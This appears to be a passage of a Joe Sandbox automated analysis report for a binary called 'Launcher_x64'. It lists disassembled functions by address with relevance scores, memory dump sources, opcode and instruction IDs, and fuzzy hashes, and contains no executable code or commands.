                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 279043dd8c5340cb0b6158fae8ffcb9100b2f6ecd3eb49fada46f4c036c50eae
                                                                                                                                                                                                                                                                                        • Instruction ID: 20ec464b07922d83c1775bf2789846d225831bb389f209247fbd487f8a225285
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 279043dd8c5340cb0b6158fae8ffcb9100b2f6ecd3eb49fada46f4c036c50eae
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 22B126746083004BD714EF25D88163BF7A2EBDE314F24A92EF58557392DB39EC06879A
                                                                                                                                                                                                                                                                                        Function 00405910 Relevance: .4, Instructions: 449COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: c0844557a0379c24c8fc1471b41180fc22d546779764b41d269fbe12e5f72335
                                                                                                                                                                                                                                                                                        • Instruction ID: 48d9341909362addc4c675d4786467c80c427c9684c637eefa89a90fde3abb45
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c0844557a0379c24c8fc1471b41180fc22d546779764b41d269fbe12e5f72335
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 40F1D2356087418FD724CF29C88066BFBE2EFD9304F08882EE5D597791E679E904CB96
                                                                                                                                                                                                                                                                                        Function 00421F20 Relevance: .4, Instructions: 439COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 3a285db9e8c7edcc63df9c36047d998941caa7c2c3dacc23210bf07a432b5b1a
                                                                                                                                                                                                                                                                                        • Instruction ID: 8cbf46bb28bf406465367b4de668a31a4b3cdd868a891f7ea0dd3351814c3364
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3a285db9e8c7edcc63df9c36047d998941caa7c2c3dacc23210bf07a432b5b1a
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EAB14772B043209BC720DF249D82A7BB3A1EF91324F49852DE99597381E37DEC05C39A
                                                                                                                                                                                                                                                                                        Function 00438E07 Relevance: .4, Instructions: 426COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 97e009e0315436a1731f6a03ee0a9a8bb827ae520f5b4c9fe0da27906fdad42e
                                                                                                                                                                                                                                                                                        • Instruction ID: f624fb7d0d2682eb8e2514ea54b8b79b30e071573567d18a4e3a07cdb7883179
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 97e009e0315436a1731f6a03ee0a9a8bb827ae520f5b4c9fe0da27906fdad42e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 92D1D37B628252CBCB185F78D8A227A73F1FF4A741F0A847DD882872A0E7388955C755
                                                                                                                                                                                                                                                                                        Function 0043ADC0 Relevance: .2, Instructions: 247COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 583f48ddf441637194c61a4853c86379af0676fd195e760495eeff77e693d592
                                                                                                                                                                                                                                                                                        • Instruction ID: 79a3a22eacaa49d51bc6397fda91b65e3fab8852545732a8213c30960ce9295d
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 583f48ddf441637194c61a4853c86379af0676fd195e760495eeff77e693d592
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 99517836A442104BC728CE38D89166BB7D2EBC9324F19963ED8E9C33A1D6389C01C796
                                                                                                                                                                                                                                                                                        Function 0043B930 Relevance: .2, Instructions: 218COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 8b8dd922ce339ffded28b357dcd6875d3759b3b2932c15326ee1b76543155c89
                                                                                                                                                                                                                                                                                        • Instruction ID: e631fc426190abaf239cdd5ea674f63a46bc15f569e73c10bda7bcf504c39271
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8b8dd922ce339ffded28b357dcd6875d3759b3b2932c15326ee1b76543155c89
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D081B27160D3828BC315CF29C49062ABBE2EFC9314F18866EE5E587382D739D801CB96
                                                                                                                                                                                                                                                                                        Function 0041B841 Relevance: .2, Instructions: 213COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 36361efd2b806579cfff043ac4214852268babc5a16b8e7cc4ddafd96c8be452
                                                                                                                                                                                                                                                                                        • Instruction ID: c0b9cc1d680a60882a3de2ac15c9bee26123d6b53933384bd255edb89fe220d1
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 36361efd2b806579cfff043ac4214852268babc5a16b8e7cc4ddafd96c8be452
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 735115755083448BC715DF24D8A17BBB7F0EFAA314F08595DE4C68B391E3389840CB96
                                                                                                                                                                                                                                                                                        Function 00429EAE Relevance: .1, Instructions: 109COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: ac5f43f0db5aef9a5675c72fefa1e6cadbe0dd0fe8f317ff2eee4b9697af1fba
                                                                                                                                                                                                                                                                                        • Instruction ID: 1fb1a4c484f9305fb9f96fdbf91e1355db21752664f8b4deeba2eb086205d656
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ac5f43f0db5aef9a5675c72fefa1e6cadbe0dd0fe8f317ff2eee4b9697af1fba
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B631F2397082109BD718EB10E89497B7393FFDA324F58853DD94653692D7789C52C60E
                                                                                                                                                                                                                                                                                        Function 0043B120 Relevance: .1, Instructions: 83COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 518086f443fff580128ecae19418ab4c0760f3fbc2505a8186285cfe44a9169e
                                                                                                                                                                                                                                                                                        • Instruction ID: 57aaab498ba3d2fe3cec4b810176ed20dd6a955b6d006dcffcdd1d6ab784161d
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 518086f443fff580128ecae19418ab4c0760f3fbc2505a8186285cfe44a9169e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5911863B6443085BD7009A15EC81A77B7AAEBDE369F19562DEBC8437A0E7359C0187E0
                                                                                                                                                                                                                                                                                        Function 0040CCCE Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 6e044806ed135f880f9590de6c64b5d29c2b97da635f2ab18857af451a72d6ca
                                                                                                                                                                                                                                                                                        • Instruction ID: c1c88eb255a944c1026b6073484b3c385cc0034301d70b777ac6f2ef2d0cc8cb
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6e044806ed135f880f9590de6c64b5d29c2b97da635f2ab18857af451a72d6ca
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6B117A90A5829155D22CE7248C52A7F76E68F9720CF18443CD0EB67643F9785646C72F
                                                                                                                                                                                                                                                                                        Function 004347D0 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                                                                        • Instruction ID: e1d107b709e1f43bbf516cc67e74c10bdacd8b251aa7c4e5f2697d77ae5d7915
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8C11E537A051D40EC31A9D3C84005E5BFA30AE7635F1993DAF4B89B2D2D6269D8B8369
                                                                                                                                                                                                                                                                                        Function 0042A940 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: ec52db255ac681eb8e4f15ef988e312655f3b6e592bf7844d79abf91d8870408
                                                                                                                                                                                                                                                                                        • Instruction ID: 56dae74563cb8337ce58dfa97546701870c97bb2c05d1d529a87927567cde1da
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ec52db255ac681eb8e4f15ef988e312655f3b6e592bf7844d79abf91d8870408
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FE019EF5B0131187D7209E13E8C172BB6A96F81708F09083EEC0857342DB7DEC6586AB
                                                                                                                                                                                                                                                                                        Function 00402B90 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 68bae6648a43b8bf7183a593b6c23035bbb1b4639a6195518a97e0b76609f489
                                                                                                                                                                                                                                                                                        • Instruction ID: 5db0e137706aa5a0632a7023dd3f0d59903c1206340d7482ebc1b1635c1be975
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 68bae6648a43b8bf7183a593b6c23035bbb1b4639a6195518a97e0b76609f489
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5DF04C3B7253190B9310DDB9ECC4527B3A2D3C9204F1A4139DB40D3381D4B5F805A1A8
                                                                                                                                                                                                                                                                                        Function 0042D37F Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: b5a32f734b6c1aa8d9b01235034392b5ecab33f24e44e5adb51b56c435098b2b
                                                                                                                                                                                                                                                                                        • Instruction ID: 5c3c3765c3e8469efd3cf8a6665b7b31590a8b06c82778f44e5a98fad0b20ad6
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b5a32f734b6c1aa8d9b01235034392b5ecab33f24e44e5adb51b56c435098b2b
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 09F06D606082D28AE712CF29D420677FFA0AF67600F686999C4E79B382C2289881C759
                                                                                                                                                                                                                                                                                        Function 0043CFC0 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: f82463bf35f6f81a6a70b41c88b031b5ff54ece0df9a954b069454a2c0903b1d
                                                                                                                                                                                                                                                                                        • Instruction ID: 3639d8a29d84ba5919e7626b029a28639efd1f0542b5bac8f4bc308327740377
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f82463bf35f6f81a6a70b41c88b031b5ff54ece0df9a954b069454a2c0903b1d
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DBF0E934A041485FEB089F75D8625FF7BB9DB4B750F14A03CE54263241D6349841C768
                                                                                                                                                                                                                                                                                        Function 00409FB5 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 539ba414b7b2dcea4b8a545e00631e1ae21b96038eac56eada3ddf7038b56721
                                                                                                                                                                                                                                                                                        • Instruction ID: 30b24ba7414dd68909bbdf87bfec220448337b97d4f0e973103b6bfeea2960e8
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 539ba414b7b2dcea4b8a545e00631e1ae21b96038eac56eada3ddf7038b56721
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E8C0123461B2809FE308CF24A8815A7B6335BD3505E2C553DC8C117217D1319515832E
                                                                                                                                                                                                                                                                                        Function 00409ED1 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 5428a3f4d637f55dd33f4135330e2b7b0f742cf5d4c0f005aa732dc7209f0901
                                                                                                                                                                                                                                                                                        • Instruction ID: 87e81ba0c8f565f686e9a9ee58845d92d04bc3974e695c2a1a6d995e921633fd
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5428a3f4d637f55dd33f4135330e2b7b0f742cf5d4c0f005aa732dc7209f0901
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 34C09239A48140DBC208CF18ECA1932E239A75BB0AF14383A9403F32A1C639D5119A0D